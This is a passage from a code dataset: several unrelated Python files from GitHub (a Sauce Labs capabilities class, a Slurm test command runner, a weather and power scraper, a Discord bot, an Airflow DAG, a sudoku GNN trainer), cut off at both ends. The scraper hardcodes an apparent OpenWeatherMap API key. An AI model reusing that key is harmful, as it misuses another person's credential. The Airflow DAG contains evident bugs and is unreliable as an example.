sauce_options=self.sauce_options.merge(other.sauce_options),\n extras=self.extras.merge(other.extras),\n w3c_mode=try_one_of_or_none(other.w3c_mode, lambda: self.w3c_mode),\n )\n return new_caps\n\n def to_dict(\n self,\n w3c_mode: Optional[bool] = None,\n auto_include_selenium_version: Optional[bool] = None,\n ) -> Dict[str, Any]:\n w3c_mode = try_one_of(w3c_mode, lambda: self.w3c_mode, default=True)\n\n data: Dict[str, Any] = {}\n if w3c_mode:\n data.update(\n {\n \"sauce:options\": {},\n }\n )\n if self.platform is not None:\n data.update(\n {\n \"platformName\": self.platform.full_name,\n }\n )\n if self.browser is not None:\n data.update(\n {\n \"browserName\": self.browser.name,\n \"browserVersion\": self.browser.version,\n }\n )\n else:\n if self.platform is not None:\n data.update(\n {\n \"platform\": self.platform.full_name,\n }\n )\n if self.browser is not None:\n data.update(\n {\n \"browserName\": self.browser.name,\n \"version\": self.browser.version,\n }\n )\n\n sauce_options_data = data[\"sauce:options\"] if w3c_mode else data\n sauce_options_data.update(\n self.sauce_options.to_dict(\n auto_include_selenium_version=auto_include_selenium_version,\n )\n )\n\n data.update(self.extras)\n\n return data\n\n\n@dataclass(frozen=True)\nclass CapabilitiesMatrix:\n browsers: Optional[List[Browser]] = None\n platforms: Optional[List[Platform]] = None\n sauce_options_list: Optional[List[SauceOptions]] = None\n\n def __structlog__(self) -> Dict[str, Any]:\n return self.to_dict()\n\n def iter_capabilities(self) -> Iterator[Capabilities]:\n browsers: Sequence[Optional[Browser]] = [None]\n if self.browsers is not None:\n browsers = self.browsers\n platforms: Sequence[Optional[Platform]] = [None]\n if self.platforms is not None:\n platforms = self.platforms\n sauce_options_list = (\n [SauceOptions.default()]\n if self.sauce_options_list is None\n else self.sauce_options_list\n )\n for browser in browsers:\n for platform in platforms:\n for sauce_options in sauce_options_list:\n yield Capabilities(\n browser=browser,\n platform=platform,\n sauce_options=sauce_options,\n )\n\n def to_dict(self) -> Dict[str, Any]:\n return dataclasses.asdict(self)\n","repo_name":"apragacz/pytest-sosu","sub_path":"pytest_sosu/webdriver/capabilities.py","file_name":"capabilities.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"31274411203","text":"import os, shlex, subprocess, sys, time\n\n# SchedMD\nfrom utils.log import (\n log,\n log_new_line,\n)\n\nCMD_HOOK = \"CMD: \"\n\n\n# Run functions with stats\ndef perform(action_desc, function, *args, verbose=True, new_line=False, decor=\"..\"):\n log_func = log\n nl = \"\"\n\n if new_line:\n log_func = log_new_line\n nl = \"\\n\"\n\n # action_desc: ie Cloning Repo, building slurm,\n if verbose:\n log_func(f\"[{decor}{action_desc}{decor}]{nl}\")\n\n start = time.perf_counter()\n result = function(*args)\n finish = time.perf_counter()\n time_stat = round(finish - start, 2)\n\n if verbose:\n log_func(f\"[{decor}{action_desc}{decor}] finished in {time_stat} seconds\")\n\n return result\n\n\ndef run_cmd(cmd, env=None, quiet=False, print_output=False, timeout=None, shell=False):\n if not quiet:\n log(CMD_HOOK + cmd)\n\n # If shell is specified, then let the shell split and parse the cmd string\n if not shell:\n cmd = shlex.split(cmd)\n\n if print_output:\n std_out = sys.stdout\n std_err = sys.stderr\n else:\n std_out = subprocess.PIPE\n std_err = subprocess.PIPE\n\n output = subprocess.run(\n cmd,\n env=env,\n stdout=std_out,\n stderr=std_err,\n timeout=timeout,\n shell=shell,\n text=True,\n )\n\n if (\n not quiet\n and not print_output\n and output.returncode != 0\n and output.stderr != \"\"\n ):\n log(\"Error: %s\" % output.stderr)\n\n # Access rc from output elsewhere with output.returncode\n return output\n\n\ndef run_cmd_or_exit(\n cmd, msg, rc=0, quiet=False, print_output=False, timeout=None, shell=False\n):\n output = run_cmd(\n cmd, quiet=quiet, print_output=print_output, timeout=timeout, shell=shell\n )\n\n if output.returncode != rc:\n log(f\"{msg}\")\n log(f\"'{cmd}' failed with returncode {output.returncode}\")\n log(f\"stderr: {output.stderr}\")\n log(f\"stdout: {output.stdout}\")\n\n sys.exit(\"Exiting\")\n else:\n return output\n","repo_name":"SchedMD/slurm","sub_path":"testsuite/src/lib/utils/cmds.py","file_name":"cmds.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":2074,"dataset":"github-code","pt":"19"} +{"seq_id":"7110757046","text":"import requests\nimport json\nimport time\nimport pyowm\n\nrequest_headers = {\n'accept': 'application/json, text/javascript, */*; q=0.01',\n'referer': 'https://www.ssen.co.uk/ANM/',\n'Sec-Fetch-Mode': 'cors',\n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',\n'X-Requested-With': 'XMLHttpRequest'\n}\n\n# api key using OpenWeatherMap\nowm = pyowm.OWM('b3b365b37e36b285df0fc807f8b76c1b')\n# get weather conditions in orkney\nobservation = owm.weather_at_id(2640923)\nw = observation.get_weather()\n\nurl = \"https://www.ssen.co.uk/Sse_Components/Views/Controls/FormControls/Handlers/ActiveNetworkManagementHandler.ashx?action=graph&contentId=14973&_=1571510420656\"\nz = requests.get(url, headers=request_headers)\n\njz = z.json()\nwith open('/root/yf/powerdataset.csv', 'a') as f:\n s = time.asctime(time.localtime()) + ','\n for i in range(5):\n s = s + str(sum(jz['data']['datasets'][i]['data'])) + ','\n s = s + str(w.get_wind()['speed']) + ',' + str(w.get_humidity()) + ',' + str(w.get_temperature('celsius')['temp'])\n s += '\\n'\n f.write(s)\n f.close()\n","repo_name":"wangwenda97/orkneypowerdataset","sub_path":"orkneyspider.py","file_name":"orkneyspider.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2570913984","text":"import traceback\n\nimport discord, datetime, json, random\nfrom discord.ext import commands\nimport aiohttp, io\nfrom random import randint\nfrom yarl import URL\nimport fast_colorthief\n\nstart_time = datetime.datetime.utcnow()\n\nclass General(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"help\")\n @commands.guild_only()\n async def help(self, ctx):\n dm = ctx.author\n embed=discord.Embed(title=\"Help\", color=discord.Color.green())\n embed.add_field(name=\"Parcility\", value=\"`[[query: package]]`\\n`!package `\\n`!repo `\", inline=False)\n embed.add_field(name=\"Homebrew\", value=\"`{{query: package/application}}`\\n`!brew `\\n`!cask `\", inline=False)\n embed.add_field(name=\"IPSW Downloads\", value=\"`!firmware `\", inline=False)\n embed.add_field(name=\"General\", value=\"`!jumbo `\\n`!userinfo [user: mention/id]`\\n`!pfp [user: mention/id]`\\n`!ping`\\n`!cat`\\n`!catgirl`\\n`!catboy`\", inline=False)\n embed.add_field(name=\"Moderation\", value=\"`!purge `\\n`!kick `\\n`!ban `\\n`!unban `\", inline=False)\n embed.add_field(name=\"Source / Invite\", value='https://github.com/xstecky/Table-Bot', inline=True)\n embed.add_field(name=\"Discord\", value='https://diatr.us/discord', inline=False)\n\n now = datetime.datetime.utcnow() # Timestamp of when uptime function is run\n delta = now - start_time\n hours, remainder = divmod(int(delta.total_seconds()), 3600)\n minutes, seconds = divmod(remainder, 60)\n days, hours = divmod(hours, 24)\n if days:\n time_format = \"{d} days, {h} hours, {m} minutes, and {s} seconds\"\n else:\n time_format = \"{h} hours, {m} minutes, and {s} seconds\"\n uptime_stamp = time_format.format(d=days, h=hours, m=minutes, s=seconds)\n\n embed.set_footer(text=f'Online for {uptime_stamp}')\n try:\n await dm.send(embed=embed)\n await ctx.send('📬')\n except:\n await ctx.send(embed=embed)\n\n @commands.command(name='jumbo', aliases=['e','enlarge','emoji'])\n @commands.guild_only()\n async def jumbo(self, ctx, emoji: discord.PartialEmoji = None):\n if emoji is None:\n embed = discord.Embed(title=\"Error\", color=discord.Color.red())\n embed.description = f'You must specify an emoji to enlarge!'\n await ctx.message.delete(delay=15)\n await ctx.send(embed=embed, delete_after=15)\n else:\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(emoji.url))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(title=emoji.name, color=color)\n embed.set_image(url=emoji.url)\n await ctx.send(embed=embed)\n\n @commands.command(name='avatar', aliases=['pfp'])\n @commands.guild_only()\n async def avatar(self, ctx, user: discord.Member = None):\n user = user or ctx.author\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png?size=16\".format(user)))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16)\n embed = discord.Embed(title=user.display_name, color=color)\n if user.is_avatar_animated():\n embed.add_field(name=\"View as\", value=f'[gif]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.gif?size=1024)\".format(user)} [png]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png?size=1024)\".format(user)} [jpg]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.jpg?size=1024)\".format(user)} [webp]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.webp?size=1024)\".format(user)}', inline=False)\n else:\n embed.add_field(name=\"View as\", value=f'[png]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png?size=1024)\".format(user)} [jpg]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.jpg?size=1024)\".format(user)} [webp]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.webp?size=1024)\".format(user)}', inline=False)\n embed.set_image(url=user.avatar_url)\n await ctx.send(embed=embed)\n\n @commands.command(name=\"info\", aliases=['userinfo', 'ui'])\n @commands.guild_only()\n async def info(self, ctx, user: discord.Member = None):\n user = user or ctx.author\n roles = \"\"\n if isinstance(user, discord.Member):\n for role in user.roles:\n if role != ctx.guild.default_role:\n roles += role.mention + \" \"\n else:\n roles = \"No roles.\"\n joined = f\"User not in {ctx.guild.name}.\"\n \n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png\".format(user)))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed=discord.Embed(title=\"User Info\", description=f\"{user.mention} ({user.id})\", color=color)\n embed.add_field(name=\"Created On\", value=user.created_at.strftime(\"%B %d, %Y\"), inline=True)\n embed.add_field(name=\"Joined On\", value=user.joined_at.strftime(\"%B %d, %Y\"), inline=True)\n embed.add_field(name=\"Roles\", value=roles if roles else \"None\", inline=False)\n embed.set_thumbnail(url=user.avatar_url)\n await ctx.send(embed=embed)\n\n @commands.command(name=\"ping\")\n @commands.guild_only()\n async def ping(self, ctx):\n lag = round(self.bot.latency*1000, 1)\n if lag >= 50:\n embed = discord.Embed(title=\"Pong!\", color=discord.Color.red())\n if lag <= 49:\n embed = discord.Embed(title=\"Pong!\", color=discord.Color.green())\n embed.description = f'Latency is {lag} ms.'\n await ctx.send(embed=embed)\n\n @commands.command(name=\"catgirl\")\n @commands.guild_only()\n async def catgirl(self, ctx):\n async with aiohttp.ClientSession() as client:\n async with client.get(URL('https://nekos.life/api/v2/img/neko', encoded=True)) as resp:\n if resp.status == 200:\n response = json.loads(await resp.text())\n image = response.get('url')\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(image))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(color=color)\n embed.set_image(url=image)\n await ctx.send(embed=embed)\n\n @commands.command(name=\"catboy\")\n @commands.guild_only()\n async def catboy(self, ctx):\n async with aiohttp.ClientSession() as client:\n async with client.get(URL('https://api.catboys.com/img', encoded=True)) as resp:\n if resp.status == 200:\n response = json.loads(await resp.text())\n image = response.get('url')\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(image))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(color=color)\n embed.set_image(url=image)\n await ctx.send(embed=embed)\n\n #@commands.command(name=\"cat\", aliases=['peepee'])\n #@commands.guild_only()\n #async def cat(self, ctx):\n # photonumber = randint(1, 947)\n # async with aiohttp.ClientSession() as client:\n # async with client.get(URL(str(f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\"))) as img:\n # image_bytes = io.BytesIO(await img.read())\n # cf = ColorThief(image_bytes)\n # dc = cf.get_color(quality=1)\n # rgb = dc\n # color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n # embed = discord.Embed(color=color)\n # embed.set_image(url=f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\")\n # await ctx.send(embed=embed)\n\n @commands.command(name=\"cat\", aliases=['peepee'])\n @commands.guild_only()\n async def cat(self, ctx):\n try:\n photonumber = randint(1, 947)\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\"))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(color=color)\n embed.set_image(url=f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\")\n await ctx.send(embed=embed)\n except Exception as e:\n await ctx.send(e)\n\ndef setup(bot):\n bot.add_cog(General(bot))\n","repo_name":"crystall1nedev/Table-Bot","sub_path":"src/commands/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":10155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41016227372","text":"## Primeira DAG com Airflow com Scheduler\r\n\r\n## Importando libs e operadores:\r\n\r\nfrom airflow import DAG\r\nfrom airflow.operators.bash.operator import BashOperator\r\nfrom airflow.python_operator import PythonOperator\r\nfrom datetime import datetime, timedelta\r\nimport pandas as pd\r\n\r\ndefault_args = {\r\n 'owner': 'Matheus Rodrigues',\r\n 'depends_on_past': False,\r\n 'start_date': datetime(),\r\n 'email': '', ## emails devem ser configurados no arquivo airflow.config [smtp].\r\n 'email_on_failure': False,\r\n 'email_on_retry': False,\r\n 'retries': 1,\r\n 'retry_delay': timedelta(minutes=1)\r\n}\r\n\r\n## Definindo DAG:\r\n\r\ndag_02 = DAG(\r\n \"dag-02\",\r\n description=\"Extrai dados do database Titaninc e calcula a idade média\",\r\n default_args = default_args,\r\n schedule_interval = timedelta(minutes=2)\r\n)\r\n\r\n## Pegando dados:\r\n\r\ntask_get_data = BashOperator(\r\n task_id = 'get_data',\r\n bash_command = 'curl {url}',\r\n dag=dag_02\r\n)\r\n\r\n## Definindo funcoes para PythonOperator:\r\n\r\ndef calculate_mean():\r\n df = pd.read_csv('')\r\n med = df.Age.mean()\r\n return med\r\n\r\ndef print_age(**context):\r\n value = context ['task_instance'].xcom_pull(task_ids='calcula_idade_media')\r\n print(f\"A idade media era {value} anos.\")\r\n\r\ntask_idade_media = PythonOperator(\r\n task_id='calcula_idade_media',\r\n python_callable=calculate_mean(),\r\n dag=dag_02\r\n)\r\n\r\ntask_print_idade = PythonOperator(\r\n task_id='mostra-idade',\r\n python_callable = print_age(),\r\n provide_context = True,\r\n dag=dag_02\r\n)\r\n\r\n## Ordenacao:\r\n\r\ntask_get_data >> task_idade_media >> task_print_idade\r\n","repo_name":"matheusrdr/engenharia-de-dados-igti","sub_path":"primeira_dag_schedulada.py","file_name":"primeira_dag_schedulada.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18343123730","text":"import time\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\n\nimport tools\nimport tests\n\nfrom model import GNN\nfrom data import Sudoku\n\n# plt.rc('figure', max_open_warning = 0)\n\n\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"PixelCNN\")\nparser.add_argument(\n \"--n_epochs\", default=30, type=int, metavar=\"N\", help=\"number of epochs to run training loop with default = 11\"\n)\n\nparser.add_argument(\n \"-b\", \"--batch_size\", default=16, type=int, metavar=\"N\", help=\"batch size training with default = 32\"\n)\n\nparser.add_argument(\"--cuda\", dest=\"cuda\", action=\"store_false\", help=\"use cuda\")\n\nparser.add_argument(\"--skip_training\", dest=\"skip_training\", action=\"store_true\", help=\"skip training\")\n\nparser.add_argument(\"-lr\", \"--learning_rate\", default=0.001, type=float, metavar=\"LR\", help=\"learning rate\")\n\n\ndef sudoku_edges():\n\n flatten_puzzle = np.reshape(np.array(range(81)), (9, 9))\n dic = {}\n for vert_index, outer_value in enumerate(flatten_puzzle):\n if vert_index in (0, 3, 6):\n up = 0\n down = 2\n if vert_index in (1, 4, 7):\n up = -1\n down = 1\n if vert_index in (2, 5, 8):\n up = -2\n down = 0\n\n for horz_index, inner_value in enumerate(outer_value):\n if horz_index in (0, 3, 6):\n right = 2\n left = 0\n if horz_index in (1, 4, 7):\n right = 1\n left = -1\n if horz_index in (2, 5, 8):\n right = 0\n left = -2\n\n for i in range(up, down + 1, 1):\n for j in range(left, right + 1, 1):\n if inner_value not in dic:\n dic[inner_value] = []\n if flatten_puzzle[vert_index + i][horz_index + j] != inner_value:\n dic[inner_value].append(flatten_puzzle[vert_index + i][horz_index + j])\n\n for i in outer_value:\n if inner_value != i:\n dic[inner_value].append(i)\n\n for l in flatten_puzzle:\n if inner_value != l[horz_index]:\n dic[inner_value].append(l[horz_index])\n dic[inner_value] = set(dic[inner_value])\n\n src_ids = [[x] * 20 for x in dic.keys()]\n src_ids = torch.Tensor([x for y in src_ids for x in y]).type(torch.LongTensor)\n dst_ids = [y for y in dic.values()]\n\n dst_ids = torch.Tensor([x for y in dst_ids for x in y]).type(torch.LongTensor)\n\n return src_ids, dst_ids\n\n\ndef collate(list_of_samples):\n \"\"\"Merges a list of samples to form a mini-batch.\n\n Args:\n list_of_samples is a list of tuples (inputs, targets),\n inputs of shape (n_nodes, 9): Inputs to each node in the graph. Inputs are one-hot coded digits\n in the sudoku puzzle. A missing digit is encoded with all zeros. n_nodes=81 for the sudoku graph.\n targets of shape (n_nodes): A LongTensor of targets (correct digits in the sudoku puzzle).\n\n Returns:\n inputs of shape (batch_size*n_nodes, 9): Inputs to each node in the graph. Inputs are one-hot coded digits\n in the sudoku puzzle. A missing digit is encoded with all zeros. n_nodes=81 for the sudoku graph.\n targets of shape (batch_size*n_nodes): A LongTensor of targets (correct digits in the sudoku puzzle).\n src_ids of shape (batch_size*1620): LongTensor of source node ids for each edge in the large graph.\n The source ids should be between 0 and batch_size * 81.\n dst_ids of shape (batch_size*1620): LongTensor of destination node ids for each edge in the large graph.\n The destination ids should be between 0 and batch_size * 81.\n \"\"\"\n inputs = [tup[0] for tup in list_of_samples]\n inputs = torch.cat(inputs, 0)\n targets = [tup[1] for tup in list_of_samples]\n targets = torch.cat(targets, 0)\n batch = len(list_of_samples)\n src, dst = sudoku_edges()\n src_ids = torch.cat([src + 81 * i for i in range(batch)], 0)\n dst_ids = torch.cat([dst + 81 * i for i in range(batch)], 0)\n return inputs, targets, src_ids, dst_ids\n\n\ndef fraction_of_solved_puzzles(gnn, testloader, device):\n with torch.no_grad():\n n_test = 0\n n_test_solved = 0\n for i, (inputs, targets, src_ids, dst_ids) in enumerate(testloader):\n batch_size = inputs.size(0) // 81\n inputs, targets = inputs.to(device), targets.to(device)\n src_ids, dst_ids = src_ids.to(device), dst_ids.to(device)\n\n outputs = gnn(inputs, src_ids, dst_ids) # [n_iters, batch*n_nodes, 9]\n solution = outputs.view(gnn.n_iters, batch_size, 9, 9, 9)\n\n final_solution = solution[-1].argmax(dim=3).to(device)\n solved = (final_solution.view(-1, 81) == targets.view(batch_size, 81)).all(dim=1)\n n_test += solved.size(0)\n n_test_solved += solved.sum().item()\n return n_test_solved / n_test\n\n\ndef main():\n \"\"\"\n \n \"\"\"\n args = parser.parse_args()\n if args.cuda:\n device = torch.device(\"cuda:0\")\n else:\n device = torch.device(\"cpu\")\n\n data_dir = tools.select_data_dir()\n\n trainset = Sudoku(data_dir, train=True)\n testset = Sudoku(data_dir, train=False)\n\n trainloader = DataLoader(trainset, batch_size=args.batch_size, collate_fn=collate)\n testloader = DataLoader(testset, batch_size=args.batch_size, collate_fn=collate)\n\n # Create network\n gnn = GNN(device)\n if not args.skip_training:\n optimizer = torch.optim.Adam(gnn.parameters(), lr=args.learning_rate)\n loss_method = nn.CrossEntropyLoss(reduction=\"mean\")\n\n for epoch in range(args.n_epochs):\n for i, data in enumerate(trainloader, 0):\n inputs, targets, src_ids, dst_ids = data\n inputs, targets = inputs.to(device), targets.to(device)\n src_ids, dst_ids = src_ids.to(device), dst_ids.to(device)\n optimizer.zero_grad()\n gnn.zero_grad()\n output = gnn.forward(inputs, src_ids, dst_ids)\n output = output.to(device)\n output = output.view(-1, output.shape[2])\n targets = targets.repeat(7, 1)\n targets = targets.view(-1)\n loss = loss_method(output, targets)\n loss.backward()\n optimizer.step()\n\n fraction = fraction_of_solved_puzzles(gnn, testloader, device)\n\n print(\"Train Epoch {}: Loss: {:.6f} Fraction: {}\".format(epoch + 1, loss.item(), fraction))\n\n tools.save_model(gnn, \"7_gnn.pth\")\n else:\n gnn = GNN(device)\n tools.load_model(gnn, \"7_gnn.pth\", device)\n\n # Evaluate the trained model\n # Get graph iterations for some test puzzles\n with torch.no_grad():\n inputs, targets, src_ids, dst_ids = iter(testloader).next()\n inputs, targets = inputs.to(device), targets.to(device)\n src_ids, dst_ids = src_ids.to(device), dst_ids.to(device)\n\n batch_size = inputs.size(0) // 81\n outputs = gnn(inputs, src_ids, dst_ids).to(device) # [n_iters, n_nodes, 9]\n\n solution = outputs.view(gnn.n_iters, batch_size, 9, 9, 9).to(device)\n final_solution = solution[-1].argmax(dim=3).to(device)\n print(\"Solved puzzles in the current mini-batch:\")\n print((final_solution.view(-1, 81) == targets.view(batch_size, 81)).all(dim=1))\n\n # Visualize graph iteration for one of the puzzles\n ix = 0\n for i in range(gnn.n_iters):\n tools.draw_sudoku(solution[i, 0], logits=True)\n\n fraction_solved = fraction_of_solved_puzzles(gnn, testloader,device)\n print(f\"Accuracy {fraction_solved}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"huongdo108/graph-neural-networks-solve-sudoku","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"86477604675","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n##### Import #####\nfrom UDFManager import *\n\nimport argparse\nimport codecs\nimport numpy as np\nimport os\nimport platform\nimport sys\nimport uuid\n\nimport cognac_deform.variables as var\n################\n##### Main #####\ndef deform():\n\t# 各種条件を読み取り\n\tread_all()\n\t# \n\tsetup()\n\treturn\n\n###################################\n# 各種条件を読み取り\ndef read_all():\n\tread_arg()\n\tread_nw_cond()\n\tread_sim_cond()\n\treturn\n\ndef read_arg():\n\tparser = argparse.ArgumentParser(description='Select udf file to read !')\n\tparser.add_argument('udf', help=\"udf file name to read previous simulation\")\n\targs = parser.parse_args()\n\tif args.udf:\n\t\tif len(args.udf.split('.')) != 2 or args.udf.split('.')[1] != 'udf':\n\t\t\tprint('\\nthe file name you selected is not udf file !')\n\t\t\tsys.exit('select proper udf file to read.')\n\t\telif not os.access(args.udf, os.R_OK):\n\t\t\tsys.exit('\\nSelected udf of ', args.udf, ' seems not exist !\\nbye now!!')\n\t\telse:\n\t\t\tvar.read_udf = args.udf\n\telse:\n\t\tprint('no udf file is selected')\n\t\tsys.exit('select proper udf file to read.')\n\treturn\n\n# 計算対象の条件を読み取る\ndef read_nw_cond():\n\tif not os.access('target_condition.udf', os.R_OK):\n\t\tsys.exit(\"\\n'target_condition.udf' is not exists.\")\n\telse:\n\t\tcond_u = UDFManager('target_condition.udf')\n\t\tvar.func = cond_u.get('TargetCond.NetWork.N_Strands')\n\t\tvar.nu = cond_u.get('TargetCond.System.Nu')\n\treturn\n\n# シミュレーション条件を設定する。\ndef read_sim_cond():\n\tif os.path.isfile('deform_condition.udf'):\n\t\tvar.deform_udf = 'deform_condition.udf'\n\t\tread_and_set()\n\telse:\n\t\twhile not os.path.isfile('../deform_condition.udf'):\n\t\t\tprint('\\nIn the parent directory, no \"deform_condition.udf\" is found !')\n\t\t\tprint('New one will be generated.')\n\t\t\tprint('Please, modify and save it !\\n')\n\t\t\tmake_newudf()\n\t\t\tinput('Press ENTER to continue...')\n\t\tvar.deform_udf = '../deform_condition.udf'\n\t\tread_and_set()\n\treturn\n\n# make new udf when not found.\ndef make_newudf():\n\tcontents = '''\n\t\\\\begin{def}\n\tCalcConditions:{\n\t\tCognac_ver:select{\"cognac112\"} \"使用する Cognac のバージョン\",\n\t\tCores: int \"計算に使用するコア数を指定\"\n\t\t} \"Cognac による計算の条件を設定\"\n\tSimpleDeformation:{\n\t\tDeformMode:select{\"none\", \"Stretch\", \"Shear\", \"both\"} \"変形モードを選択\",\n\t\t\tStretch:{\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\tShear:{\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\tboth:{\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t} \"計算ターゲットの条件を設定\"\t\t\n\tCycleDeformation:{\n\t\tCyclicDeform:select{\"none\", \"CyclicStretch\", \"CyclicShear\"} \"変形モードを選択\",\n\t\tCyclicStretch:{\n\t\t\tStretchConditions[]:{\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tRepeat:int \"サイクルの繰り返し数\",\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\t}\n\t\tCyclicShear:{\n\t\t\tShearConditions[]:{\n\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\tRepeat:int \"サイクルの繰り返し数\",\n\t\t\t\tDeformRate[]:float \"これらは変形レートのリスト\",\n\t\t\t\tResolution:float \"これは1ステップ計算での伸長度 Res = lambda/1_step\"\n\t\t\t\t}\n\t\t\t}\n\t\t} \"計算ターゲットの条件を設定\"\n\tStepDeformation:{\n\t\tStepDeform:select{\"none\", \"StepStretch\", \"StepShear\"} \"変形モードを選択\",\n\t\tStepStretch:{\n\t\t\tStretchConditions:{\n\t\t\t\tDeformation:{\n\t\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\t\tDeformRate:float \"変形レート\",\n\t\t\t\t\tDeformSteps:int \"シミュレーションのステップ数\"\n\t\t\t\t\t}\n\t\t\t\tRelaxation[]:{\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する時間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\tRepeat[]:{\n\t\t\t\t\tRepeat:int \"繰り返し数\",\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する���間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\tStepShear:{\n\t\t\tShearConditions:{\n\t\t\t\tDeformation:{\n\t\t\t\t\tMaxDeformation:float \"最大ひずみ\",\n\t\t\t\t\tDeformRate:float \"変形レート\",\n\t\t\t\t\tDeformSteps:int \"シミュレーションのステップ数\"\n\t\t\t\t\t}\n\t\t\t\tRelaxation[]:{\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する時間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\tRepeat[]:{\n\t\t\t\t\tRepeat:int \"繰り返し数\",\n\t\t\t\t\tRelaxationTime:int \"緩和を観測する時間\",\n\t\t\t\t\tCalcSteps:int \"緩和時間の分割数\",\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} 